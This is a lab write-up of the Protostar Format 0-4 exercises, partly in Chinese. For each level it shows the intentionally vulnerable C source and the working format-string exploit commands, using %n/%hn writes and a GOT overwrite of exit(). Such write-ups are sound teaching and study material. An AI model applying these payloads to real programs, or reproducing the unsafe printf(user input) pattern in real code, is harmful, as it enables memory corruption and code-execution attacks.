Protostar Format 0-4 Write-up

Format 0

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

/*
 * Format 0: the challenge's vulnerable function.
 *
 * `string` comes straight from argv[1] (attacker-controlled) and is used as
 * the *format* argument of sprintf(), into a fixed 64-byte `buffer` with no
 * length bound. That is two defects at once:
 *   - format-string injection: any conversion in `string` is interpreted;
 *   - stack buffer overflow: output longer than 63 bytes runs past `buffer`.
 * The write-up's exploit relies on `target` sitting directly after `buffer`
 * on the stack (compiler/layout dependent). A fixed version would be
 * snprintf(buffer, sizeof buffer, "%s", string). Left unchanged here because
 * the exploit steps on this page depend on this exact code.
 */
void vuln(char *string)  
{
  volatile int target;   /* volatile: the compiler may not assume it stays 0 after `target = 0` */
  char buffer[64];       /* 64 bytes: a 64-wide conversion fills it exactly, then spills */

  target = 0;

  sprintf(buffer, string);  /* VULN: user-controlled format string, unbounded write */

  if(target == 0xdeadbeef) {
    printf("you have hit the target correctly :)\n");
  }
}

/*
 * Entry point: hands argv[1] to vuln() unchanged.
 * NOTE(review): argc is never checked, so running the binary with no
 * argument passes a NULL pointer to vuln() and on to sprintf().
 */
int main(int argc, char **argv)  
{
  vuln(argv[1]);
}

Format string exploit. `%64d` makes sprintf() emit exactly 64 characters, so `buffer[64]` is filled and the four bytes appended after the conversion are written past it into `target` (the stack layout this write-up relies on). The value is supplied little-endian, hence the reversed byte order 0xdeadbeef → ef be ad de:

/opt/protostar/bin/format0 %64d`python -c 'print("\xef\xbe\xad\xde")'`

Format 1

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int target;  /* global, uninitialised (normally .bss) -- its fixed address is what `objdump -t` reports and what the payload embeds */

/*
 * Format 1: `string` (argv[1]) is passed to printf() as the format itself.
 * A "%N$n" conversion in it makes printf() store the number of characters
 * written so far into whatever pointer it finds in stack argument N; the
 * exploit places &target at the start of the input so that pointer is
 * &target. Any non-zero value passes the check below.
 * A fixed version would be printf("%s", string) or fputs(string, stdout).
 */
void vuln(char *string)  
{
  printf(string);  /* VULN: attacker-controlled format string */

  if(target) {     /* any non-zero write counts as success */
    printf("you have modified the target :)\n");
  }
}

/*
 * Entry point: hands argv[1] to vuln() unchanged.
 * NOTE(review): argc is never checked, so running the binary with no
 * argument passes a NULL pointer to vuln() and on to printf().
 */
int main(int argc, char **argv)  
{
  vuln(argv[1]);
}

找target地址

 objdump -t /opt/protostar/bin/format1 | grep target

查找偏移量:用 DDDD(0x44444444)做标记,逐个尝试 %N$08x,看输入本身出现在第几个栈参数位置。这个偏移与 argv/环境变量布局有关,必须实际测出,不能照抄:

for i in {1..200};do echo "trying offset $i - `/opt/protostar/bin/format1 DDDD%$i\\$08x`"; done | grep DDDD44444444

构造 payload:把 target 的地址(小端序)放在最前面,再用上一步测出的偏移(这里是 132)让 %n 通过该地址写入。注意 payload 的前 4 字节长度与测试时的 DDDD 一致,否则栈对齐会变:

/opt/protostar/bin/format1 `python -c 'print("\x38\x96\x04\x08")'`%132\$08n

Format 2

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int target;  /* global, uninitialised (normally .bss); the exploit needs it set to exactly 64 */

/*
 * Format 2: the format string now arrives on stdin via fgets(), so the
 * read itself is bounded by sizeof(buffer) -- no overflow -- but `buffer`
 * is still handed to printf() as the format. Because the check wants the
 * exact value 64, the exploit controls the "%n" counter with padding:
 * 4 address bytes + 60 filler characters = 64 characters printed.
 */
void vuln()  
{
  char buffer[512];

  fgets(buffer, sizeof(buffer), stdin);  /* bounded read; return value unchecked (buffer is indeterminate on EOF) */
  printf(buffer);                        /* VULN: format string taken from stdin */

  if(target == 64) {
    printf("you have modified the target :)\n");
  } else {
    printf("target is %d :(\n", target);  /* echoes the value written -- useful for tuning the padding */
  }
}

/* Entry point: argc/argv are unused; all input comes from stdin inside vuln(). */
int main(int argc, char **argv)  
{
  vuln();
}

首先查找target地址

objdump -t /opt/protostar/bin/format2 | grep target

查找偏移,方法同 format1,但输入改为 stdin,所以先把测试串写入文件再重定向;测得偏移为 4:

for i in {1..200};do echo DDDD%$i\$08x > temp; echo "trying offset $i - `/opt/protostar/bin/format2 < temp`"; done | grep DDDD44444444

%n 写入的是到它为止已输出的字符数。只放 4 字节地址时写入的就是 4(程序会回显 "target is 4"):

python -c "print '\xe4\x96\x04\x08'+'%4\$n'" | /opt/protostar/bin/format2

补 60 个 'A' 作为填充,使已输出字符数为 4 + 60 = 64:

python -c "print '\xe4\x96\x04\x08'+'A'*60+'%4\$n'" | /opt/protostar/bin/format2

Format 3

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int target;  /* global, uninitialised (normally .bss); must end up as 0x01025544, written as two 16-bit halves */

/*
 * Thin wrapper whose only job is the vulnerable printf(). The extra call
 * frame changes where the input sits relative to printf()'s arguments,
 * which is presumably why the write-up's offsets (12/13) differ from
 * format2's (4).
 */
void printbuffer(char *string)  
{
  printf(string);  /* VULN: caller's stdin buffer used as the format string */
}

/*
 * Format 3: same stdin-fed format-string bug as format2, but the printf()
 * is one call deeper (printbuffer) and the required value is 0x01025544.
 * Reaching that with a single "%n" would mean printing ~16.9 million
 * characters, so the write-up uses two "%hn" (16-bit) writes instead:
 * high half 0x0102 to &target+2 first, then low half 0x5544 to &target.
 */
void vuln()  
{
  char buffer[512];

  fgets(buffer, sizeof(buffer), stdin);  /* bounded read; return value unchecked */

  printbuffer(buffer);                    /* VULN: buffer becomes printf()'s format */

  if(target == 0x01025544) {
    printf("you have modified the target :)\n");
  } else {
    printf("target is %08x :(\n", target);  /* shows the partial result after each attempt */
  }
}

/* Entry point: argc/argv are unused; all input comes from stdin inside vuln(). */
int main(int argc, char **argv)  
{
  vuln();
}

查找 target 地址(方法同上):`objdump -t /opt/protostar/bin/format3 | grep target`,得到 0x080496f4。

查找偏移量(方法同 format2)。这里 printf 多了 printbuffer() 一层调用,测得输入的前 4 字节在偏移 12,后 4 字节在偏移 13。

目标值 target == 0x01025544(约 1690 万)。用一个 %n 一次写完就得输出 1690 万个字符,不现实,所以拆成两个 16 位的半字分别写:高半字 0x0102 和低半字 0x5544。

0x0102 = 258

0x5544 = 21828

先把两个写入地址放在 payload 开头:\xf6\x96\x04\x08(0x080496f6,target 的高 2 字节)和 \xf4\x96\x04\x08(0x080496f4,低 2 字节),共 8 字节,也就是已经输出了 8 个字符。所以后面 %Nx 的填充宽度(下文的"偏移量"指的是这个宽度,不是栈偏移)为

填充宽度(0x0102) = 258 - 8 = 250

填充宽度(0x5544) = 21828 - 258 = 21570(%n 的计数是累积的,第二次只需补上差值)

使用 %hn 每次只写入 2 个字节(short),这样两次写入互不覆盖,也不会碰到 target 相邻的内存。

构造 exp。顺序很重要:%n 的计数只增不减,所以必须先写较小的值。这里 0x0102 < 0x5544,因此地址先放 \xf6(高半字,偏移 12),再放 \xf4(低半字,偏移 13),填充先 0x0102 再 0x5544:

echo `python -c "print '\xf6\x96\x04\x08\xf4\x96\x04\x08'"`%250x%12\$hn%21570x%13\$hn | /opt/protostar/bin/format3

中间有大段的空格,最后显示结果

Format 4

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int target;  /* declared but never read or written by this level; the exploit targets exit()'s GOT entry instead */

/*
 * Never called by the program itself -- it exists only as the exploit's
 * destination. _exit(1) terminates immediately without running exit()'s
 * handlers, presumably so control never re-enters the hijacked exit() path.
 */
void hello()  
{
  printf("code execution redirected! you win\n");
  _exit(1);
}

/*
 * Format 4: the format-string bug is followed by exit(1), which never
 * returns, so there is no value check to satisfy. exit is a dynamically
 * linked libc function reached through its GOT entry (0x08049724 in the
 * write-up); overwriting that entry with hello()'s address (0x080484b4)
 * turns the exit(1) call into a call to hello().
 */
void vuln()  
{
  char buffer[512];

  fgets(buffer, sizeof(buffer), stdin);  /* bounded read; return value unchecked */

  printf(buffer);  /* VULN: format string from stdin; two %hn writes patch the GOT here */

  exit(1);         /* hijacked: jumps to hello() once the GOT entry is overwritten */
}

/* Entry point: argc/argv are unused; all input comes from stdin inside vuln(). */
int main(int argc, char **argv)  
{
  vuln();
}

hello() 在程序里没有任何调用点。漏洞触发在 printf(buffer) 处,紧接着调用 exit(1)。exit 是动态链接的 libc 函数,调用时通过 GOT 表项跳转,所以要覆盖的不是"返回地址",而是 exit 的 GOT 表项:把它改成 hello 的地址,exit(1) 这一步就会跳进 hello()。用 objdump 查找 hello 的地址(`objdump -t`),并在动态重定位表中查找 exit 的 GOT 表项地址(例如 `objdump -R`)。

查找偏移(方法同 format2,通过 stdin 输入),测得仍为 4。

需要把 exit 的 GOT 表项(地址 0x08049724)中的内容覆盖为 hello 的地址 0x080484b4。按 format3 的方法,把这个地址拆成两个 16 位半字:

0x0804 = 2052

0x84b4 = 33972

计算偏移

0x0804 - 8 = 2052 - 8 = 2044(前面 8 字节地址已经输出)

0x84b4 - 0x0804 = 33972 - 2052 = 31920(%n 计数累积,只补差值;较小的 0x0804 必须先写,所以 0x08049726 放在前面、0x08049724 放在后面)

构造exp

echo `python -c "print '\x26\x97\x04\x08\x24\x97\x04\x08'"`%2044x%4\$hn%31920x%5\$hn | /opt/protostar/bin/format4

输出一大串空格之后,返回成功
